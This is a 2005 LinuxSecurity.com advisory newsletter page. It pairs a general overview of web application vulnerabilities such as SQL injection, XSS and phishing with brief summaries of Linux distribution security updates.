LinuxSecurity.com
Share your story
The central voice for Linux and Open Source security news
Home News Topics Advisories HOWTOs Features Newsletters About Register

Welcome!
Sign up!
EnGarde Community
Login
Polls
What is the most important Linux security technology?
 
Advisories
Community
Linux Events
Linux User Groups
Link to Us
Security Center
Book Reviews
Security Dictionary
Security Tips
SELinux
White Papers
Featured Blogs
All About Linux
DanWalsh LiveJournal
Securitydistro
Latest Newsletters
Linux Security Week: October 20th, 2014
Linux Advisory Watch: October 17th, 2014
Subscribe
LinuxSecurity Newsletters
E-mail:
Choose Lists:
About our Newsletters
RSS Feeds
Get the LinuxSecurity news you want faster with RSS
Powered By

  
Linux Advisory Watch: March 4th 2005 Print E-mail
User Rating:      How can I rate this item?
Source: LinuxSecurity.com Contributors - Posted by Benjamin D. Thomas   
Linux Advisory Watch This week, advisories were released for mod_python, bsmtpd, gaim, bind, gnucash, dhcp, at vixie-cron, lam, pvm, radvd, selinux-targeted- policy, tcsh, openoffice, gamin, cmd5checkpw, uim, UnAce, MediaWiki, phpBB, phpWebSite, xli, xloadimage, firefox, squid, kdenetwork, nvidia, curl, uw-imap, and cyrus-sasl. The distributors include Conectiva, Debian, Fedora, Gentoo, Red Hat, and SuSE.


Internet Productivity Suite: Open Source Security - Trust Internet Productivity Suite's open source architecture to give you the best security and productivity applications available. Collaborating with thousands of developers, Guardian Digital security engineers implement the most technologically advanced ideas and methods into their design. Click to find out more!

VULNERABILITIES IN WEB APPLICATIONS
By Raymond Ankobia

This is by no means an exhaustive list but an indication of some serious flaws exploited by hackers. Hacking Exposed: Web Applications (ISBN 007222438X) as a good source for the subject area.

Buffer Overflow Attack: Usually perpetrated in a form of stack, heap or format string attack [3]. Without doubt, one of the oldest problems exposed by poor programming; yet attacks continue to be perpetrated on large scale, simply due to lack of rigorous security routines in web applications. To get the system to run their own code, attackers construct an input string sometimes with other malicious code that is long enough to overrun memory space assigned to it [7]. By doing so, this spills over and overwrites the stack below, overwriting what was initially in that address space. If the code contains malicious payload, it may subvert the system and escalate any privileges it may have garnered.

SQL Injection Attack: Most e-commerce web sites use dynamic content to attract and appeal to potential customers by displaying their wares using dynamic SQL queries and front-end scripts. An attacker could inject special characters and commands into a SQL database and modify the intended query. Chaining additional commands with intent of causing unexpected behavior could alter the meaning to a query. Not only could the attacker be able to read the entire database, but also in some circumstances, alter prices of these commodities.

Cross Site Scripting Attack: (XSS Attacks) This attack is executed by embedding malicious message in an HTML form [4] [3] and posting it as a message to say a newsgroup or bulletin board. By viewing the message, the user unintentionally gets the code interpreted and executed by the web browser triggering its associated payload.

Input Validation Attack: Typically used by most active attackers to check for client side validation of fields and if successful then try to escalate privileges gained [3]. Poorly validated client-side (typically a web browser) allows an attacker to tamper with parameters sent to the server. Server-side may also compromised if trust is implicit and validation poorly executed from the client-side.

Phishing Attack: This attack is mainly executed due to vulnerability in some versions of web browsers. Attackers are able to create bogus websites and masquerade as legitimate commercial ones. They normally operate by sending spoofed emails to unsuspecting customers, advising them to visit their bank's website to reactivate or update their accounts. The embedded addresses in these emails tend to have some hidden characters cleverly constructed to make the page appear to be a legitimate one. On clicking the embedded website address, the unsuspecting user is redirected to a fake website where the credentials and details of bank accounts are taken and later used to empty the accounts.

[4] This anomaly is due to obfuscation techniques used by the URL to parse information. URL may be parsed in different ways using decimal, hexadecimal and dWord format. A particular vulnerability in Internet explorer allowed an attacker to construct and hide information by simply using the @ symbol in ways that makes it possible to redirect traffic to bogus sites.

Mobile code: Most common languages used for developing mobile code include Java, ActiveX control and Shockwave. Traditionally the programme gets downloaded from a web server onto the customer‚s machine. Environments used for execution include Virtual Machines (in browsers) or downloadable plug-ins. These programmes could be maliciously crafted to subvert the security and system functionality by causing crashes and disruption of normal operating environment.

Insecure Configuration Management: The communicating parties end points, especially their web servers, are poorly configured. Often ignored, but the area most attacked by hackers as a way of bypassing security offered by encryption and other security mechanisms [4]. Apache and IIS dominate commercial deployment of web servers and some of the earlier releases are riddled with bugs. Simply installing these applications with default settings is a bad practice. Poorly programmed sample scripts are exploited by attackers who may easily take control of the server resources.

Google Hacking: Google's search engine traverses the Internet, crawling websites, and taking snapshots of each web page it examines and caches its results. Next time a query is received, the search is performed on these cached pages, allowing for faster retrieval [4]. Hackers exploit these caches for vulnerable sites. The mechanism used by Google is explained in great depth in a white paper written by Foundstone (www.foundstone.com) called SiteDigger,. Tools such as these are the Swiss army knives of hackers. Using search engines, hackers find vulnerability scanning reports and intrusion detection alerts and log files. These are then used to find suitable targets to exploit.

Read full feature:
http://www.linuxsecurity.com/content/view/118427/49/

 

LinuxSecurity.com Feature Extras:

Getting to Know Linux Security: File Permissions - Welcome to the first tutorial in the 'Getting to Know Linux Security' series. The topic explored is Linux file permissions. It offers an easy to follow explanation of how to read permissions, and how to set them using chmod. This guide is intended for users new to Linux security, therefore very simple. If the feedback is good, I'll consider creating more complex guides for advanced users. Please let us know what you think and how these can be improved.

The Tao of Network Security Monitoring: Beyond Intrusion Detection - To be honest, this was one of the best books that I've read on network security. Others books often dive so deeply into technical discussions, they fail to provide any relevance to network engineers/administrators working in a corporate environment. Budgets, deadlines, and flexibility are issues that we must all address. The Tao of Network Security Monitoring is presented in such a way that all of these are still relevant.

Encrypting Shell Scripts - Do you have scripts that contain sensitive information like passwords and you pretty much depend on file permissions to keep it secure? If so, then that type of security is good provided you keep your system secure and some user doesn't have a "ps -ef" loop running in an attempt to capture that sensitive info (though some applications mask passwords in "ps" output).

 

Bulletproof Virus Protection - Protect your network from costly security breaches with Guardian Digital’s multi-faceted security applications. More then just an email firewall, on demand and scheduled scanning detects and disinfects viruses found on the network. Click to find out more!

Take advantage of our Linux Security discussion list! This mailing list is for general security-related questions and comments. To subscribe send an e-mail to security-discuss-request@linuxsecurity.com with "subscribe" as the subject.

Thank you for reading the LinuxSecurity.com weekly security newsletter. The purpose of this document is to provide our readers with a quick summary of each week's most relevant Linux security headline.


   Conectiva
  Conectiva: mod_python Fix for mod_python vulnerability
  2nd, March, 2005

The package mod_python[1] provides an Apache module that embeds the Python interpreter within the server. This annoucement fixes an information leak vulnerability[2] in mod_python which could allow a remote attacker to obtain access to restricted objects via a specially crafted URL.

http://www.linuxsecurity.com/content/view/118467
 
   Debian
  Debian: New bsmtpd packages fix arbitrary command execution
  25th, February, 2005

Updated package.

http://www.linuxsecurity.com/content/view/118432
 
   Fedora
  Fedora Core 2 Update: gaim-1.1.4-0.FC2
  25th, February, 2005

This update resolves another DoS issue in parsing malformed HTML, and a MSN related crash that folks were hitting often.

http://www.linuxsecurity.com/content/view/118433
 
  Fedora Core 3 Update: gaim-1.1.4-0.FC3
  25th, February, 2005

This update resolves another DoS issue in parsing malformed HTML, and a MSN related crash that folks were hitting often.

http://www.linuxsecurity.com/content/view/118434
 
  Fedora Core 3 Update: bind-9.2.5rc1-1
  25th, February, 2005

Upgraded to ISC BIND version 9.2.5rc1 . Added support for LDAP, PostgreSQL and filesystem Simplified Database Backends (SDB) with the bind-sdb package, and for development with libbind, the BIND 8 compatible resolver library, with the bind-libbind-devel package. Fixed various bugs (see ChangeLog below).

http://www.linuxsecurity.com/content/view/118435
 
  Fedora Core 3 Update: gnucash-1.8.11-0.fc3
  25th, February, 2005

This update updates gnucash to the latest upstream release, 1.8.11. This also includes: - update of libofx to 0.7.0 - switching of the HBCI backend from openhbci to gwenhywfar/aqbanking/aqhbci

http://www.linuxsecurity.com/content/view/118436
 
  Fedora Core 3 Update: dhcp-3.0.1-40_FC3
  25th, February, 2005

Updated package.

http://www.linuxsecurity.com/content/view/118437
 
  Fedora Core 3 Update: at-3.1.8-64_FC3
  25th, February, 2005

at(1) now supports access control with PAM (limits.conf, access.conf).

http://www.linuxsecurity.com/content/view/118438
 
  Fedora Core 3 Update: vixie-cron-4.1-24_FC3
  25th, February, 2005

Updated package.

http://www.linuxsecurity.com/content/view/118439
 
  Fedora Core 3 Update: lam-7.1.1-1_FC3
  25th, February, 2005

Updated package.

http://www.linuxsecurity.com/content/view/118440
 
  Fedora Core 3 Update: pvm-3.4.5-2_FC3
  25th, February, 2005

Updated package.

http://www.linuxsecurity.com/content/view/118441
 
  Fedora Core 3 Update: radvd-0.7.3-1_FC3
  25th, February, 2005

Upgrade to new upstream version 0.7.3 .

http://www.linuxsecurity.com/content/view/118442
 
  Fedora Core 3 Update: selinux-policy-targeted-1.17.30-2.83
  28th, February, 2005

Updated packages.

http://www.linuxsecurity.com/content/view/118448
 
  Fedora Core 3 Update: firefox-1.0.1-1.3.1
  28th, February, 2005

This update fixes several security vulnerabilities in Firefox 1.0. It is recommended that all users update to Firefox 1.0.1. Additionally, this update backports several fixes from rawhide.

http://www.linuxsecurity.com/content/view/118449
 
  Fedora Core 3 Update: tcsh-6.13-10.FC3.1
  28th, February, 2005

This update fixes incorrect message output under certain locales in new mail notification, changing resource limits and listing possible completions.

http://www.linuxsecurity.com/content/view/118450
 
  Fedora Core 3 Update: openoffice.org-1.1.3-6.5.0.fc3
  28th, February, 2005

Fix individual programs not launching.

http://www.linuxsecurity.com/content/view/118451
 
  Fedora Core 3 Update: gamin-0.0.25-1.FC3
  2nd, March, 2005

This release fixes some problems with gamin-0.0.24 especially for temporary storage like USB keys.

http://www.linuxsecurity.com/content/view/118469
 
   Gentoo
  Gentoo: cmd5checkpw Local password leak vulnerability
  25th, February, 2005

cmd5checkpw contains a flaw allowing local users to access other users cmd5checkpw passwords.

http://www.linuxsecurity.com/content/view/118443
 
  Gentoo: uim Privilege escalation vulnerability
  28th, February, 2005

Under certain conditions, applications linked against uim suffer from a privilege escalation vulnerability.

http://www.linuxsecurity.com/content/view/118446
 
  Gentoo: UnAce Buffer overflow and directory traversal vulnerabilities
  28th, February, 2005

UnAce is vulnerable to several buffer overflow and directory traversal attacks.

http://www.linuxsecurity.com/content/view/118447
 
  Gentoo: MediaWiki Multiple vulnerabilities
  28th, February, 2005

MediaWiki is vulnerable to cross-site scripting, data manipulation and security bypass attacks.

http://www.linuxsecurity.com/content/view/118452
 
  Gentoo: phpBB Multiple vulnerabilities
  1st, March, 2005

Several vulnerabilities allow remote attackers to gain phpBB administrator rights or expose and manipulate sensitive data.

http://www.linuxsecurity.com/content/view/118461
 
  Gentoo: Gaim Multiple Denial of Service issues
  1st, March, 2005

Multiple vulnerabilities have been found in Gaim which could allow a remote attacker to crash the application.

http://www.linuxsecurity.com/content/view/118463
 
  Gentoo: phpWebSite Arbitrary PHP execution and path disclosure
  1st, March, 2005

Remote attackers can upload and execute arbitrary PHP scripts, another flaw reveals the full path of scripts.

http://www.linuxsecurity.com/content/view/118464
 
  Gentoo: xli, xloadimage Multiple vulnerabilities
  2nd, March, 2005

xli and xloadimage are vulnerable to multiple issues, potentially leading to the execution of arbitrary code.

http://www.linuxsecurity.com/content/view/118470
 
   Red Hat
  RedHat: Critical: firefox security update
  1st, March, 2005

Updated firefox packages that fix various bugs are now available. This update has been rated as having critical security impact by the Red Hat Security Response Team.

http://www.linuxsecurity.com/content/view/118462
 
  RedHat: Moderate: squid security update
  3rd, March, 2005

Updated squid packages that fix a denial of service issue are now available. This update has been rated as having important security impact by the Red Hat Security Response Team

http://www.linuxsecurity.com/content/view/118476
 
  RedHat: Low: kdenetwork security update
  3rd, March, 2005

Updated kdenetwork packages that fix a file descriptor leak are now available. This update has been rated as having low security impact by the Red Hat Security Response Team

http://www.linuxsecurity.com/content/view/118477
 
   SuSE
  SuSE: kernel / nvidia bugfix update
  25th, February, 2005

The previous kernel security update for the SUSE Linux 9.1 and the SUSE Linux Enterprise Server 9 based products caused problems with the NVidia driver for users with NVidia graphics cards.

http://www.linuxsecurity.com/content/view/118431
 
  SuSE: curl buffer overflow in NTLM
  28th, February, 2005

infamous41md@hotpop.com reported a vulnerability in libcurl, the HTTP/FTP retrieval library. This library is used by lots of programs, including YaST2 and PHP4.

http://www.linuxsecurity.com/content/view/118445
 
  SuSE: uw-imap authentication bypass
  1st, March, 2005

The University of Washington imap daemon can be used to access mails remotely using the IMAP protocol. This update fixes a logical error in the challenge response authentication mechanism CRAM-MD5 used by UW IMAP. Due to this mistake a remote attacker can gain access to the IMAP server as arbitrary user.

http://www.linuxsecurity.com/content/view/118456
 
  SuSE: cyrus-sasl remote code execution
  3rd, March, 2005

A buffer overflow in the digestmda5 code was identified that could lead to a remote attacker executing code in the context of the service using sasl authentication.

http://www.linuxsecurity.com/content/view/118472
 

Only registered users can write comments.
Please login or register.

Powered by AkoComment!

 
< Prev   Next >
    
Partner

 

Latest Features
Peter Smith Releases Linux Network Security Online
Securing a Linux Web Server
Password guessing with Medusa 2.0
Password guessing as an attack vector
Squid and Digest Authentication
Squid and Basic Authentication
Demystifying the Chinese Hacking Industry: Earning 6 Million a Night
Free Online security course (LearnSIA) - A Call for Help
What You Need to Know About Linux Rootkits
Review: A Practical Guide to Fedora and Red Hat Enterprise Linux - Fifth Edition
Yesterday's Edition
USB is now UEC (use with extreme caution)
iPhone Encryption and the Return of the Crypto Wars
Partner Sponsor

Community | HOWTOs | Blogs | Features | Book Reviews | Networking
 Security Projects |  Latest News |  Newsletters |  SELinux |  Privacy |  Home
 Hardening |   About Us |   Advertise |   Legal Notice |   RSS |   Guardian Digital
(c)Copyright 2014 Guardian Digital, Inc. All rights reserved.